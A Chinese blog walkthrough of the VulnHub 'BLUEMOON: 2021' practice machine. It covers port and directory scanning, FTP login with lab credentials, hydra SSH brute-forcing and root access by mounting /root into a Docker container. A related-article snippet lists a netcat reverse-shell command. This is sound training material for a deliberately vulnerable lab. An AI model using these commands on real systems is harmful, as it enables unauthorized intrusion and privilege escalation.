vulnhub之 BLUEMOON: 2021

最新推荐文章于 2024-01-23 15:48:01 发布
最新推荐文章于 2024-01-23 15:48:01 发布
阅读量418 收藏 1
点赞数 1
分类专栏: 网络安全 文章标签: 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qwweggfe/article/details/119561665
版权

信息搜集:

首先进行目录扫描

进行端口扫描

nmap -sC -sV -p- 192.168.181.148 --min-rate=2000

 

开启了21,22,和80端口,于是打开网页进行查看

 进行目录探测

gobuster dir -u http://192.168.181.148/  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x php,bak,txt,html -t 20

扫描到/hidden_text 网页进行查看

打开后发现一个二维码

进行渗透测试

于是使用微信扫一扫可以获得ftp账号密码

#!/bin/bash HOST=ip USER=userftp PASSWORD=ftpp@ssword ftp -inv $HOST user $USER $PASSWORD bye EOF

 于是进行ftp登录

登录成功,发现两个文件

 将其get到本地

进行查看

 我猜测robin可能是用户名,他还告诉我们另一个文件是密码破解文件,于是进行密码破解

hydra -l robin -P /root/p_lists.txt ssh://192.168.181.148

于是进行ssh登录

 于是获得第一个flag

 提权:

 首先发现这个脚本文件的属主和属组都是robin,于是给其最高权限,并于jerry的用户运行

 python -c 'import pty; pty.spawn("/bin/bash")'

 可以来到jerry用户

 在查看id时就可以发现,dokcer有权限,可能docker进行提权

 确实有

运行他

docker run -it -v /root:/mnt/hhh alpine

可以获得最高权限

获得最终flag 

 最近有点事,所以晚发了两天,大家见谅!

我带的我们
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bluemoon靶机渗透测试
weixin_49340699的博客
06-17 1035
bluemoon靶机渗透测试 环境 kali ;靶机 工具 netdiscover,nmap,dirb,在线解码工具,hydra 流程 我的靶机主机网卡有问题在进入时改一下配置 把ro改为rw signie init=/bin/bash然后ctrl+x运行 进去把/etc/network/interfaces内的网卡名改为ens33(一般虚拟机的虚拟网卡名都是ens33) 用netdiscover –i eth0 –r 192.168.19.0/24对目标网段扫描发现主机 然后nmap –sV 192.
Vulnhub--BlueSky:1
m0_63206880的博客
12-30 702
靶场下载地址https://download.vulnhub.com/bluesky/BlueSky.ova 首先扫描一下外网存活ip 找到目标机器的ip 扫描开放了扫描端口服务 得知开了 22 ssh 与8080 目标上还运行了一个Apache Tomcat Tomcat是应用(java)服务器,它只是一个servlet容器,是Apache的扩展 Struts2 漏洞介绍 Struts2:是apache项目下的一个web 框架 漏洞涉及Stru...
VulnHub-BLUEMOON: 2021靶机
NeverForgetCX的博客
03-29 5075
前言: 时隔二十多天我又来了,到vulnhub上随便下了个靶机进行打靶试试。 kali:192.168.22.140 靶机IP:192.168.22.144 信息收集: 扫描靶机IP: arp-scan -l 获得靶机ip: 扫描靶机开放的端口和服务: nmap -A -p 1-65535 192.168.22.144 看见开放的端口是21,22,...
BLUEMOON: 2021
wanguixiu的博客
06-11 555
BLUEMOON: 2021 作者: admin 时间: 2021-06-10 分类: vulnhub靶场 fping -g 192.168.137.1/24 # step1 扫主机,找到靶场131 nmap -A -p 1-65535 -v 192.168.137.131 # step2 扫端口,扫到21,22,80 dirb http:/...
vulnhub靶场之bluemoon
weixin_42478365的博客
04-28 747
sudo切换用户,docker提权,文件配置信息泄露
vulnhub靶机bluemoon
最新发布
m0_73248913的博客
01-23 413
vulnhub靶机
BlueMoon:BlueMoon Js是初学者的Javascript备忘单
05-06
"BlueMoon: BlueMoon Js是初学者的Javascript备忘单"这个资源可能是为了帮助新手快速掌握JavaScript的基础知识,以便他们能够创建功能丰富的网页或应用程序。 JavaScript语法基础: 1. 变量:JavaScript中的变量...
blue-moon:Neovim的暗色方案源自全黑和碳黑
05-16
Plug ' kyazdani42/blue-moon ' 设置 您需要启用termguicolors才能使主题正常工作 set termguicolors colorscheme blue - moon 要配置灯光线,请添加以下行: let g: lightline = { ' colorscheme ' : ' blue-...
bluemoon响应式后台模板
06-01
"Bluemoon响应式后台模板"是一款专为后端开发者和网页设计师设计的专业网站源码,具有高度的灵活性和适应性。响应式设计是其核心特性,这意味着该模板能够根据用户使用的设备(如桌面、平板或手机)自动调整布局和...
Bluemoon Helper-crx插件
04-02
Bluemoon Helper-crx插件是一款专为英语用户设计的工具,主要用于增强与Bluemoon相关的功能,特别是处理和管理合并字段。在IT领域,插件是软件的一种扩展,它能添加新功能或改进现有应用的性能,通常是为了满足特定...
登录的测试设计点
qq_47962059的博客
12-16 375
登录的测试设计点 1.不输入用户名与密码,点击登录,是否会有提示密码及用户名不能为空 2.当只输入一个的时候,点击登录,页面中是否会出现提示的文字,密码或者用户名不能为空的字段 3.当输入用户名的时候,用户名是否够所要求的的字数 4.若输入相同字段的空格或者特殊的字符啥的,是否会报出提示,请输入正确规则的用户名 5.当输入密码的时候,密码的长度是否与他所规定的范围一致 6.如果密码中含有空格特殊的字符什么的是否会给予提示,密码输入的不正确 7.若密码与用户名输入的都正确后,点击登录,是否会跳转到成功登录的那
vulnhub--Bulesky
weixin_45922278的博客
02-03 1016
目录 一、信息收集 二、漏洞探测 三、漏洞利用 四、提权 五、总结 靶场信息: 地址:https://www.vulnhub.com/entry/bluesky-1,623/ 发布日期:2020年12月10日 难度:简单 目标:获取root shell即(root@localhost:~#),然后在/root下获取标志 运行:VMware Workstation 16.x Pro(默认的NAT网络模式,VMware比VirtualBox更好地工作) 一、信息收集 1...
信息安全学习的网站
酒鸿色的心专栏
02-27 3970
信息安全学习的网站  如果你连这么多文字看下去的耐心都没有就没有必要看下面了                                              --------  酷安全             -----先来点文字说点东西!学习网址在后面 必备技能: 知识点: 一、常见数据库 Oracle、DB2、SqlServer、MySql、Access ..等
渗透与防御技术
YangYubo091699的博客
05-09 2万+
Kali操作系统的基本配置和使用 一、安装 下载KALI操作系统 https://www.kali.org/get-kali/ 二、修改root sudo passwd 三、基本工具介绍 信息搜集工具集: 主要面向网路、端口、服务识别、web指纹等一系列目标信息探测类的工具,常用工具有nmap masscan gobuster (zmap OneForAll) 漏洞分析工具集: 主要面向漏洞的发现、漏洞分析类的工具,漏洞主要面向系统、web、网络设备,常用的工具有 nikto web程序渗透
关于nmap所有的参数
Mi1k7ea
03-12 1万+
在Kali中,直接输入nmap即可查看相应的参数信息。下面直接上各个参数的解释。 TARGET SPECIFICATION目标说明: -iL :指定包含多个主机IP地址的文件 -iR :随机选择IP地址,需要输入相应的主机数 --exclude :将IP段中某些IP排除、不进行扫描 --excludefile :排除扫描文件中的主机IP HOST DISCOVE
FTP登录时指定用户名密码的方法
热门推荐
皓月如我的专栏
06-18 6万+
ftp是网络常用命令,但是使用此命令时都必须根据提示交互式的输入用户名和密码,对于希望程序自动执行或者批处理而言很不方便。下面提供两种ftp登陆时指定用户名密码的方法:1.使用命令ftp://username:password@hostname:port   这种用法只能在览器里使用,不能在命令行使用。2.在命令行里可以使用配置文件来解决这个问题:   格式:ftp -s:[配置文
新手入侵笔记
weixin_33736832的博客
03-21 6454
【 拿shell 】  1.直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就利用IIS6.0解析漏洞”:1.asp;1.jpg/1.asp;.jpg/1.asp;jpg/1.asp;.xls  2.上传图片木马遇到拦截系统,连图片木马都上传不了,记事本打开图片木马在代码最前面加上gif89a,一般就能逃过拦截系统了。  3.上传图片木马把地址复制到...
vulnhub | BROKEN-2020: 1
水榭山寺花烂漫,凤凰集外雁归来。敢与云峰争秀色,妙雨莲花九重开。
09-07 484
文章目录总结前言开始 总结 - 0. arp 扫描 | netdiscover -i eth0 | arp-scan --interface=eth0 --localnet - 0.1 查看定时任务 | cat /etc/crontab - 1. python 开启一个http服务器 | python3 -m http.server 8080 - 2. nc 开启监听 | nc -lvp 4444 - 3. nc 反弹shell | nc -e /bin/bash 10.0.2.4 4444 -
nmap超时时间_Nmap时间和性能
cunjiu9486的博客
10-09 3611
nmap超时时间[rps-include post=6632] [rps-include post = 6632] Performance is important part of the scan. Nmap developers always looks for optimized and adjustable performance options. Adjustable scan perf...
BluePrism入门教程:从基础到进阶
"这份资源是针对BluePrism的基础学习资料,用中文编撰,适合RPA初学者。它涵盖了从入门到进阶的各种概念,帮助理解BluePrism的工作原理和如何使用其核心功能。" 在BluePrism的基础学习中,首先会接触到的是【简介】...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值